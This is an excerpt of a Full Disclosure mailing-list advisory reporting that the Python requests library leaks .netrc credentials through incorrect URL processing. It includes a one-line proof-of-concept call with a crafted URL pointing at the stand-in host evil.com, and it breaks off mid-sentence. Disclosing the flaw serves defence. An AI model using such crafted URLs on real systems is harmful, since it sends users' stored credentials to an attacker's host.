Full Disclosure mailing list archives From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org> Date: Sat, 31 May 2025 06:30:50 +0000 The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. Issuing the following API call triggers the vulnerability: requests.get('http://example.com:@evil.com/&apos;) Assuming .netrc credentials are configured for ...